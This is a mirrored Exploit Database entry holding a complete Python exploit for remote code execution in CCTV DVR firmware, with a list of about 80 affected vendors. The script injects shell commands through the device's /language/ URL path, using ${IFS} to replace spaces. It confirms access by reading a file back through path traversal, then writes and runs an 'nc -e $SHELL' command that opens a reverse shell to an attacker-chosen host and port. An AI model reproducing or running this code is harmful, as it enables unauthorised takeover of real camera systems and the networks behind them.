Multiple CCTV-DVR Vendors – Remote Code Execution

• Exploit Database
• 15 阅读

• 作者： K1P0D
  日期： 2016-03-23
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/39596/

• #!/usr/bin/python
  
  # Blog post: http://www.kerneronsec.com/2016/02/remote-code-execution-in-cctv-dvrs-of.html
  
  '''
  Vendors List
  
  Ademco
  ATS Alarmes technolgy and ststems
  Area1Protection
  Avio
  Black Hawk Security
  Capture
  China security systems
  Cocktail Service
  Cpsecured
  CP PLUS
  Digital Eye'z no website
  Diote Service & Consulting
  DVR Kapta
  ELVOX 
  ET Vision 
  Extra Eye 4 U
  eyemotion 
  EDS 
  Fujitron 
  Full HD 1080p
  Gazer 
  Goldeye 
  Goldmaster
  Grizzly 
  HD IViewer
  Hi-View 
  Ipcom
  IPOX 
  IR
  ISC Illinois Security Cameras, Inc.
  JFL Alarmes 
  Lince 
  LOT
  Lux 
  Lynx Security 
  Magtec 
  Meriva Security 
  Multistar 
  Navaio
  NoVus 
  Optivision 
  PARA Vision
  Provision-ISR 
  Q-See 
  Questek 
  Retail Solution Inc
  RIT Huston .com 
  ROD Security cameras 
  Satvision 
  Sav Technology
  Skilleye 
  Smarteye 
  Superior Electrial Systems
  TechShell 
  TechSon
  Technomate 
  TecVoz 
  TeleEye 
  Tomura
  truVue
  TVT 
  Umbrella 
  United Video Security System, Inc
  Universal IT Solutions
  US IT Express
  U-Spy Store
  Ventetian 
  V-Gurad Security
  Vid8 
  Vtek
  Vision Line
  Visar
  Vodotech.com 
  Vook 
  Watchman 
  Xrplus 
  Yansi 
  Zetec
  ZoomX
  '''
  
  from sys import argv
  import optparse
  from urlparse import urlparse
  from re import compile
  import socket
  import requests
  from requests.exceptions import ConnectionError, Timeout, ContentDecodingError
  from socket import timeout
  
  
  
  
  def main():
  
  # parse command line options and atguments
  optparser = optparse.OptionParser(usage="%s <target-url> [options]" % argv[0])
  optparser.add_option('-c','--check',action="store_true",dest="checkvuln", default=False,
   help="Check if target is vulnerable")
  optparser.add_option('-e','--exploit', action="store", type="string", dest="connback",
   help="Fire the exploit against the given target URL")
  
  (options, args) = optparser.parse_args()
  
  try:
  target = args[0]
  except IndexError:
  optparser.print_help()
  exit()
  
  target_url = urlparse(target)
  
  # validating hostname
  if not target_url.hostname:
  print "[X] supplied target \"%s\" is not a valid URL" % target
  optparser.print_help()
  exit()
  
  # A little hack to handle read timeouts, since urllib2 doesnt give us this functionality.
  socket.setdefaulttimeout(10)
  
  # is -c flag on check if target url is vulnrable.
  if options.checkvuln is True:
  print "[!] Checking if target \"%s\" is vulnable..." % target_url.netloc
  try:
  
  # Write file
  raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}1>test&&tar${IFS}/string.js'
   % (target_url.scheme, target_url.netloc))
  
  # Read the file.
  response = raw_url_request('%s://%s/../../../../../../../mnt/mtd/test' % (target_url.scheme, target_url.netloc))
  
  
  # remove it..
  raw_url_request('%s://%s//language/Swedish${IFS}&&rm${IFS}test&&tar${IFS}/string.js'
   % (target_url.scheme, target_url.netloc))
  
  except (ConnectionError, Timeout, timeout) as e:
  print "[X] Unable to connect. reason: %s.exiting..." % e.message
  return
  if response.text[0] != '1': 
  print "[X] Expected response content first char to be '1' got %s. exiting..." % response.text
  return
  
  print "[V] Target \"%s\" is vulnerable!" % target_url.netloc
  
  
  
  # if -e is on then fire exploit,
  if options.connback is not None:
  
  # Validate connect-back information.
  pattern = compile('(?P<host>[a-zA-Z0-9\.\-]+):(?P<port>[0-9]+)')
  match = pattern.search(options.connback)
  if not match:
  print "[X] given connect back \"%s\" should be in the format for host:port" % options.connback
  optparser.print_help()
  exit()
  
  # fire remote code execution!
  
  # Three ..
  try:
  raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}nc${IFS}%s${IFS}%s${IFS}>e&&${IFS}/a'
  % (target_url.scheme, target_url.netloc, match.group('host'), match.group('port')))
  
  # Two ...
  
  raw_url_request('%s://%s/language/Swedish${IFS}&&echo${IFS}"-e${IFS}$SHELL${IFS}">>e&&${IFS}/a'
   % (target_url.scheme, target_url.netloc))
  
  
  # One. Left off!
  raw_url_request('%s://%s/language/Swedish&&$(cat${IFS}e)${IFS}&>r&&${IFS}/s'
   % (target_url.scheme, target_url.netloc))
  
  except (ConnectionError, Timeout, timeout) as e:
  print "[X] Unable to connect reason: %s.exiting..." % e.message
  
  
  
  print "[V] Exploit payload sent!, if nothing went wrong we should be getting a reversed remote shell at %s:%s" \
  % (match.group('host'), match.group('port'))
  
  
  # Disabling URL encode hack
  def raw_url_request(url):
  r = requests.Request('GET')
  r.url = url
  r = r.prepare()
  # set url without encoding
  r.url = url
  
  s = requests.Session()
  return s.send(r)
  
  
  
  if __name__ == '__main__':
  main()